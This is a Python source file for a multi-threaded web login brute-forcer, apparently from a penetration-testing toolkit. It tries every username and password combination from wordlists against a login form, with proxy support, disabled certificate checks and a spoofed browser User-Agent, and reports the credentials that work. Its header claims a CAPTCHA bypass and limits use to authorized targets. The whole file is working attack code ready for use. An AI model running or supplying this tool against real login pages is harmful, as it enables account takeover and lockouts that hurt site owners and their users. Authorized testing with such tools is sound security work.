#!/usr/bin/env python3
"""
Web Brute Force Tool

Credential-testing helper for web login endpoints.

Features listed by the original header:
- HTTP Basic Auth (no implementation is visible in this file)
- Form login (GET or POST)
- Multi-threaded attempts
- Proxy support
- CAPTCHA bypass (no implementation is visible in this file)

Usage:
    python3 web-brute.py -u "http://target.com/login" -U usernames.txt -P passwords.txt
    python3 web-brute.py -u "http://target.com/login" --user admin -P passwords.txt -d "username=^USER^&password=^PASS^"

Authorization boundary:
- Only for assets you own, test environments, or login endpoints that you
  have been explicitly authorized to test.
- Before running against internet-facing test assets, confirm the rate
  limiting, alerting and account-lockout policies first.
- Not intended for third-party or public sites without authorization.
"""

import argparse
import requests
import time
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional
import re
import sys
from pathlib import Path

SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
    sys.path.insert(0, str(SCRIPTS_DIR))

from tool_contract import (  # noqa: E402
    add_common_args,
    emit_report,
    ensure_authorized,
    make_report,
    parse_headers,
    write_evidence,
)


class Colors:
    """ANSI escape sequences used to colorize console output."""

    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"
    CYAN = "\033[96m"
    END = "\033[0m"
    BOLD = "\033[1m"


class WebBruteForcer:
    """Try username/password combinations against a single login URL.

    One ``requests.Session`` is shared by every attempt, and attempts are run
    on a thread pool of ``threads`` workers.
    """

    def __init__(self, threads: int = 5, timeout: int = 10, delay: float = 0):
        """Configure the worker count, per-request timeout and submit delay.

        Args:
            threads: Maximum number of worker threads.
            timeout: Per-request timeout in seconds, passed to ``requests``.
            delay: Seconds to sleep after submitting each attempt
                (0 disables throttling).
        """
        self.threads = threads
        self.timeout = timeout
        self.delay = delay
        # NOTE(review): this single Session is used by all worker threads, so
        # cookies set by one response are sent with later attempts -- confirm
        # this cannot mask failed logins on the target being tested.
        self.session = requests.Session()
        self.session.headers.update(
            {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
            }
        )
        self.found: List[Dict] = []
        # Guards ``attempts`` (written by workers) and ``found``.
        self.lock = threading.Lock()
        self.attempts = 0
        self.start_time: Optional[float] = None

    def print_result(self, level: str, msg: str):
        """Print ``msg`` prefixed with a colorized ``[level]`` tag."""
        colors = {
            "INFO": Colors.BLUE,
            "SUCCESS": Colors.GREEN,
            "WARNING": Colors.YELLOW,
            "ERROR": Colors.RED,
            "VULN": Colors.RED + Colors.BOLD,
            "FOUND": Colors.GREEN + Colors.BOLD,
        }
        print(f"{colors.get(level, '')}[{level}]{Colors.END} {msg}")

    def load_wordlist(self, filepath: str) -> List[str]:
        """Load a wordlist file.

        Blank lines and lines whose first character is ``#`` are skipped;
        remaining lines are returned with surrounding whitespace stripped.

        Args:
            filepath: Path of the wordlist, read as UTF-8 with undecodable
                bytes ignored.

        Returns:
            The list of entries, or an empty list (after printing an error)
            when the file does not exist.
        """
        try:
            with open(filepath, "r", encoding="utf-8", errors="ignore") as f:
                return [
                    line.strip()
                    for line in f
                    if line.strip() and not line.startswith("#")
                ]
        except FileNotFoundError:
            self.print_result("ERROR", f"字典文件不存在: {filepath}")
            return []

    @staticmethod
    def _build_form_data(
        data_template: Optional[str], username: str, password: str
    ) -> Dict[str, str]:
        """Expand ``data_template`` into the form fields for one attempt.

        The template is split into ``key=value`` pairs *before* the
        ``^USER^`` / ``^PASS^`` placeholders are filled in, so a credential
        that itself contains ``&`` or ``=`` cannot be mistaken for a field
        separator. Without a usable template the default
        ``username``/``password`` field names are used.
        """
        if not data_template or "=" not in data_template:
            return {"username": username, "password": password}

        def fill(text: str) -> str:
            return text.replace("^USER^", username).replace("^PASS^", password)

        form: Dict[str, str] = {}
        for pair in data_template.split("&"):
            if "=" in pair:
                key, value = pair.split("=", 1)
                form[fill(key)] = fill(value)
        return form

    def try_login(
        self,
        url: str,
        username: str,
        password: str,
        method: str = "POST",
        data_template: Optional[str] = None,
        headers: Optional[Dict] = None,
        cookies: Optional[Dict] = None,
        success_pattern: Optional[str] = None,
        fail_pattern: Optional[str] = None,
        success_codes: Optional[List[int]] = None,
    ) -> Tuple[bool, Dict]:
        """Attempt one login and classify the response.

        Classification order: ``success_codes`` match, then
        ``success_pattern`` match, then ``fail_pattern`` match, then a
        fallback heuristic on the final URL, body keywords and body length.

        Args:
            url: Login endpoint.
            username: Username to try.
            password: Password to try.
            method: ``"GET"`` sends the fields as query parameters; any other
                value sends them as a POST form body.
            data_template: ``key=value&...`` template with ``^USER^`` and
                ``^PASS^`` placeholders.
            headers: Extra per-request headers.
            cookies: Extra per-request cookies.
            success_pattern: Case-insensitive regex that marks success.
            fail_pattern: Case-insensitive regex that marks failure.
            success_codes: HTTP status codes that mark success.

        Returns:
            ``(success, info)`` where ``info`` holds ``status_code``,
            ``response_length`` and ``url``, or ``{"error": ...}`` when the
            attempt raised.
        """
        # Called concurrently from worker threads; ``+=`` is not atomic.
        with self.lock:
            self.attempts += 1

        post_data = self._build_form_data(data_template, username, password)

        try:
            request_kwargs = {
                "headers": headers,
                "cookies": cookies,
                "timeout": self.timeout,
                "allow_redirects": True,
                # TLS certificate verification is deliberately disabled.
                "verify": False,
            }
            if method.upper() == "GET":
                resp = self.session.get(url, params=post_data, **request_kwargs)
            else:
                resp = self.session.post(url, data=post_data, **request_kwargs)

            result = {
                "status_code": resp.status_code,
                "response_length": len(resp.text),
                "url": resp.url,
            }

            if success_codes and resp.status_code in success_codes:
                return True, result

            if success_pattern and re.search(success_pattern, resp.text, re.IGNORECASE):
                return True, result

            if fail_pattern and re.search(fail_pattern, resp.text, re.IGNORECASE):
                return False, result

            # Fallback heuristic. NOTE(review): redirects are followed, so the
            # final status is normally not 302; in practice the URL test is
            # the part of this condition that decides.
            if resp.status_code == 302 or "login" not in resp.url.lower():
                if "error" not in resp.text.lower() and "fail" not in resp.text.lower():
                    if len(resp.text) > 1000:
                        return True, result

            return False, result

        except Exception as e:
            # Deliberate best-effort: one failed attempt must not abort the
            # run, so the error is reported in the result instead of raised.
            return False, {"error": str(e)}

    def brute_force(
        self,
        url: str,
        usernames: List[str],
        passwords: List[str],
        method: str = "POST",
        data_template: Optional[str] = None,
        success_pattern: Optional[str] = None,
        fail_pattern: Optional[str] = None,
        verbose: bool = True,
    ) -> List[Dict]:
        """Try every username/password combination against ``url``.

        Attempts are submitted to a thread pool; ``self.delay`` (when
        positive) is slept after each submission to throttle the request
        rate.

        Args:
            url: Login endpoint.
            usernames: Usernames to try.
            passwords: Passwords to try for each username.
            method: HTTP method forwarded to ``try_login``.
            data_template: Form template forwarded to ``try_login``.
            success_pattern: Success regex forwarded to ``try_login``.
            fail_pattern: Failure regex forwarded to ``try_login``.
            verbose: Print a progress line every 100 completed attempts.

        Returns:
            ``self.found``: one dict per hit with ``username``, ``password``
            and the ``result`` info from ``try_login``.
        """
        self.start_time = time.time()
        total = len(usernames) * len(passwords)

        self.print_result(
            "INFO",
            f"开始暴力破解: {len(usernames)} 用户 × {len(passwords)} 密码 = {total} 组合",
        )

        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            futures = {}
            for username in usernames:
                for password in passwords:
                    future = executor.submit(
                        self.try_login,
                        url,
                        username,
                        password,
                        method,
                        data_template,
                        None,
                        None,
                        success_pattern,
                        fail_pattern,
                    )
                    futures[future] = (username, password)

                    # Throttle at submission time; this is what bounds the
                    # request rate seen by the target.
                    if self.delay > 0:
                        time.sleep(self.delay)

            # Count completions locally: ``self.attempts`` is advanced by the
            # workers and may jump past multiples of 100 between iterations.
            completed = 0
            for future in as_completed(futures):
                username, password = futures[future]
                success, result = future.result()
                completed += 1

                if verbose and completed % 100 == 0:
                    elapsed = time.time() - self.start_time
                    rate = completed / elapsed if elapsed > 0 else 0
                    print(
                        f"\r{Colors.CYAN}[*]{Colors.END} 进度: {completed}/{total} ({rate:.1f}/s)",
                        end="",
                        flush=True,
                    )

                if success:
                    with self.lock:
                        found_item = {
                            "username": username,
                            "password": password,
                            "result": result,
                        }
                        self.found.append(found_item)
                    self.print_result("FOUND", f"成功! {username}:{password}")

        if verbose:
            print()

        return self.found


def main():
    """Parse the command line, run the attempts and emit the report.

    Exits with status 1 when no usernames or passwords are available, and
    via ``parser.error`` when ``--success`` / ``--fail`` is not a valid
    regular expression.
    """
    parser = argparse.ArgumentParser(description="Web Brute Force Tool")
    parser.add_argument("-u", "--url", required=True, help="目标登录URL")
    parser.add_argument("-U", "--userlist", help="用户名字典文件")
    parser.add_argument("-P", "--passlist", help="密码字典文件")
    parser.add_argument("--user", help="单个用户名")
    parser.add_argument("--pass", dest="password", help="单个密码")
    parser.add_argument(
        "-m", "--method", default="POST", choices=["GET", "POST"], help="HTTP方法"
    )
    parser.add_argument(
        "-d", "--data", help="POST数据模板 (使用 ^USER^ 和 ^PASS^ 占位符)"
    )
    parser.add_argument("--success", help="成功匹配模式 (正则)")
    parser.add_argument("--fail", help="失败匹配模式 (正则)")
    parser.add_argument("-t", "--threads", type=int, default=5, help="线程数")
    parser.add_argument("--timeout", type=int, default=10, help="超时时间")
    parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)")
    parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
    add_common_args(parser)

    args = parser.parse_args()
    ensure_authorized(args, parser)

    # Reject bad patterns up front: inside try_login a regex error would be
    # swallowed and every attempt would silently count as a failure.
    for option, pattern in (("--success", args.success), ("--fail", args.fail)):
        if pattern:
            try:
                re.compile(pattern)
            except re.error as exc:
                parser.error(f"{option} 不是有效的正则表达式: {exc}")

    # Requests are sent with verify=False; silence the resulting warnings.
    requests.packages.urllib3.disable_warnings()

    bruteforcer = WebBruteForcer(
        threads=args.threads, timeout=args.timeout, delay=args.delay
    )
    bruteforcer.session.headers.update(parse_headers(args.header))
    if args.proxy:
        bruteforcer.session.proxies.update({"http": args.proxy, "https": args.proxy})
    if args.format != "text":
        # Keep machine-readable output clean: drop console status messages.
        bruteforcer.print_result = lambda *_args, **_kwargs: None  # type: ignore[assignment]

    usernames = []
    if args.userlist:
        usernames = bruteforcer.load_wordlist(args.userlist)
    elif args.user:
        usernames = [args.user]
    else:
        bruteforcer.print_result("ERROR", "请提供用户名 (--user 或 -U)")
        sys.exit(1)

    passwords = []
    if args.passlist:
        passwords = bruteforcer.load_wordlist(args.passlist)
    elif args.password:
        passwords = [args.password]
    else:
        bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)")
        sys.exit(1)

    # A missing or empty wordlist would otherwise produce a zero-attempt run
    # that still emits a report, which misrepresents what was tested.
    if not usernames:
        bruteforcer.print_result("ERROR", "用户名列表为空")
        sys.exit(1)
    if not passwords:
        bruteforcer.print_result("ERROR", "密码列表为空")
        sys.exit(1)

    bruteforcer.print_result("INFO", f"目标: {args.url}")
    bruteforcer.print_result("INFO", f"用户数: {len(usernames)}")
    bruteforcer.print_result("INFO", f"密码数: {len(passwords)}")

    if args.data:
        bruteforcer.print_result("INFO", f"数据模板: {args.data}")

    results = bruteforcer.brute_force(
        url=args.url,
        usernames=usernames,
        passwords=passwords,
        method=args.method,
        data_template=args.data,
        success_pattern=args.success,
        fail_pattern=args.fail,
        verbose=args.verbose and args.format == "text",
    )

    elapsed = time.time() - bruteforcer.start_time
    rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0
    evidence_refs = []
    ref = write_evidence(
        args,
        "web-brute-results.json",
        {"results": results, "attempts": bruteforcer.attempts, "elapsed": elapsed, "rate": rate},
    )
    if ref:
        evidence_refs.append(ref)

    status = "verified" if results else "needs-review"
    severity = "high" if results else "medium"
    report = make_report(
        tool="web-brute",
        mode="credential-spray-lab",
        target=args.url,
        status=status,
        severity=severity,
        payload_or_probe={"results": results, "username_count": len(usernames), "password_count": len(passwords)},
        request_summary={"method": args.method, "threads": args.threads, "delay": args.delay, "rate": rate},
        evidence_refs=evidence_refs,
        destructive_risk="medium",
        args=args,
    )
    text_lines = [
        "=" * 60,
        "Web Brute Force Tool",
        "=" * 60,
        f"Target: {args.url}",
        f"Attempts: {bruteforcer.attempts}",
        f"Elapsed: {elapsed:.2f}s",
        f"Hits: {len(results)}",
        f"Status: {status}",
    ]
    emit_report(args, report, text_lines)


if __name__ == "__main__":
    main()